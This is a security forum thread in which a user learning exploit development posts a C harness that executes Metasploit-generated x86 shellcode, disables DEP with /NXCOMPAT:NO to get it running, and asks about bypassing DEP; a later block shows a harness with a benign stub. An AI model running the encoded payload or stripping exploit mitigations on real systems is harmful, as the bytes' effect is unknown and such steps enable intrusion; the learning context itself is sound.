Testing shellcode in C/C++

    • #4668
      zeroflaw
      Participant

      Instead of using shellcode from generators etc, I decided to learn how to write shellcode myself. So the first step would be writing something that can test the shellcode before I attempt to use it in exploits.

      I googled around a bit and found a few C/C++ examples of how to do it. It makes use of a function pointer that points to the shellcode buffer. Well I keep getting an exception about some access violation. I don’t really like to ask questions, because maybe I should google around some more and find out on my own. I’m not sure if there’s something wrong with the shellcode because I don’t know how to write it yet.

      Here's my code. I compiled it with Microsoft Visual C++ 2008.


      #include <stdio.h>

      // The x86 shellcode to run. Generated with Metasploit.
      // Note: a global char array is placed in the writable data section,
      // which is not executable when DEP is on.
      char shellCode[] =
      "\xbf\x83\xaf\xc1\xb7\xdb\xca\xd9\x74\x24\xf4\x31\xc9\xb1\x32"
      "\x58\x31\x78\x12\x03\x78\x12\x83\x6b\x53\x23\x42\x97\x44\x2d"
      "\xad\x67\x95\x4e\x27\x82\xa4\x5c\x53\xc7\x95\x50\x17\x85\x15"
      "\x1a\x75\x3d\xad\x6e\x52\x32\x06\xc4\x84\x7d\x97\xe8\x08\xd1"
      "\x5b\x6a\xf5\x2b\x88\x4c\xc4\xe4\xdd\x8d\x01\x18\x2d\xdf\xda"
      "\x57\x9c\xf0\x6f\x25\x1d\xf0\xbf\x22\x1d\x8a\xba\xf4\xea\x20"
      "\xc4\x24\x42\x3e\x8e\xdc\xe8\x18\x2f\xdd\x3d\x7b\x13\x94\x4a"
      "\x48\xe7\x27\x9b\x80\x08\x16\xe3\x4f\x37\x97\xee\x8e\x7f\x1f"
      "\x11\xe5\x8b\x5c\xac\xfe\x4f\x1f\x6a\x8a\x4d\x87\xf9\x2c\xb6"
      "\x36\x2d\xaa\x3d\x34\x9a\xb8\x1a\x58\x1d\x6c\x11\x64\x96\x93"
      "\xf6\xed\xec\xb7\xd2\xb6\xb7\xd6\x43\x12\x19\xe6\x94\xfa\xc6"
      "\x42\xde\xe8\x13\xf4\xbd\x66\xe5\x74\xb8\xcf\xe5\x86\xc3\x7f"
      "\x8e\xb7\x48\x10\xc9\x47\x9b\x55\x25\x02\x86\xff\xae\xcb\x52"
      "\x42\xb3\xeb\x88\x80\xca\x6f\x39\x78\x29\x6f\x48\x7d\x75\x37"
      "\xa0\x0f\xe6\xd2\xc6\xbc\x07\xf7\xa4\x23\x94\x9b\x2a";

      int main()
      {
          void (*shell)(); // Function pointer.
          shell = (void(*)()) (&shellCode); // Point it at the shellcode buffer.

          printf("Shellcode at: %p\n", shellCode);
          printf("Function pointer points to: %p\n", shell);

          // Run it!
          printf("Running shellcode...\n");
          shell();

          return 0;
      }

      And I’m getting this from the assembly. I see it fails after the call to the shellcode.


                      // Run it!
                      shell();
                      008813FC 8B F4            mov         esi,esp
                      008813FE FF 55 F8         call        dword ptr [shell]
      breaks here --> 00881401 3B F4            cmp         esi,esp
                      00881403 E8 33 FD FF FF   call        @ILT+310(__RTC_CheckEsp) (88113Bh)

      I hope you guys can help me! Or at least point me in the right direction. Thanks in advance.

      ZF

    • #29065
      zeroflaw
      Participant

      Never mind guys, I found the solution. Apparently the “Data Execution Prevention” or DEP kicked in, preventing code from running from non-executable memory regions.

      Compiling with “/NXCOMPAT:NO” prevents this from happening. Now I can finally test my shellcode 😛

      Btw, does anyone know how to bypass this? Will DEP render all buffer overflow exploits useless?

      ZF
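
Rather than switching DEP off for the whole image with /NXCOMPAT:NO, a test harness can keep DEP on and grant execute rights only to the buffer that holds the bytes under test, and only after they have been written (W^X). The block below is an added example, not code from this thread: it uses a constructed six-byte x86-64 stub that just returns 42 in place of real shellcode, and assumes VirtualAlloc/VirtualProtect on Windows and mmap/mprotect elsewhere.

```c
#define _GNU_SOURCE   /* keeps MAP_ANONYMOUS visible on glibc */
#include <string.h>
#ifdef _WIN32
#include <windows.h>
#else
#include <sys/mman.h>
#endif
/* Constructed stand-in for shellcode: x86-64 "mov eax, 42 ; ret".
 * A successful call just returns 42 to the caller, nothing more. */
static const unsigned char test_code[] = { 0xB8, 0x2A, 0x00, 0x00, 0x00, 0xC3 };

/* The stub is x86-64 only; on any other CPU we refuse to run it. */
int payload_supported(void) {
#if defined(__x86_64__) || defined(_M_X64)
    return 1;
#else
    return 0;
#endif
}
/* Map a fresh page RW, copy the bytes in, then flip it to RX. DEP stays on for
 * the process; only this buffer is executable, never while writable (W^X). */
static void *map_executable(const unsigned char *code, size_t len) {
#ifdef _WIN32
    DWORD old;
    void *p = VirtualAlloc(NULL, len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (!p) return NULL;
    memcpy(p, code, len);
    if (!VirtualProtect(p, len, PAGE_EXECUTE_READ, &old)) { VirtualFree(p, 0, MEM_RELEASE); return NULL; }
#else
    void *p = mmap(NULL, len, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (p == MAP_FAILED) return NULL;
    memcpy(p, code, len);
    if (mprotect(p, len, PROT_READ | PROT_EXEC) != 0) { munmap(p, len); return NULL; }
#endif
    return p;
}
/* Call the bytes through a function pointer, as the thread's harness does,
 * but from the RX mapping, not the RW data section. -1 = could not run. */
int run_test_code(void) {
    if (!payload_supported()) return -1;
    void *p = map_executable(test_code, sizeof test_code);
    if (!p) return -1;
    int result = ((int (*)(void))p)();
#ifdef _WIN32
    VirtualFree(p, 0, MEM_RELEASE);
#else
    munmap(p, sizeof test_code);
#endif
    return result;
}
```

With this approach the same access violation the thread shows is what you get if the protection flip is skipped, which makes it a useful check that DEP is actually in force for your build.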

    • #29066
      Ketchup
      Participant

      I had a nice paper on bypassing DEP, but I can’t find it anywhere. I did find this one:

      http://www.milw0rm.com/papers/161

Copyright ©2021 Caendra, Inc.